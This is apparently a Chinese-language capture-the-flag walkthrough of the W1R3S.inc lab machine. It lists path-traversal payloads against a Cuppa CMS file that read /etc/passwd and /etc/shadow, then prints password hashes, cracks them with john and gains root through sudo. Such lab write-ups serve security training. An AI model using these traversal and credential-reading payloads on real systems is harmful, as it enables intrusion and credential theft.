W1R3S.inc

一、主机发现

二、信息收集

1.目录扫描

dirsearch -u http://192.168.20.129

3.搜索框架漏洞

searchsploit Cuppa 

查看

searchsploit -m php/webapps/25971.txt
cat 25971.txt

显示特殊url有漏洞

复制到url栏

http://192.168.20.129/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

没有回显，执行

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.20.129/administrator/alerts/alertConfigField.php

发现用户

查找密码，执行

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.20.129/administrator/alerts/alertConfigField.php 

分别是root，www-data，w1r3s

root：$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0

www-data：$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1

w1r3s：$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.

将用户名和对应的密码放到文件里

用john破解

结果

三、提权

1.使用w1r3s尝试ssh连接

ssh w1r3s@192.168.20.129

2.使用sudo -l

3.写一个sh文件

echo '/bin/bash' >> root.sh

4.给权限

chmod +x root.sh

5.执行

sudo ./root.sh

6.提权成功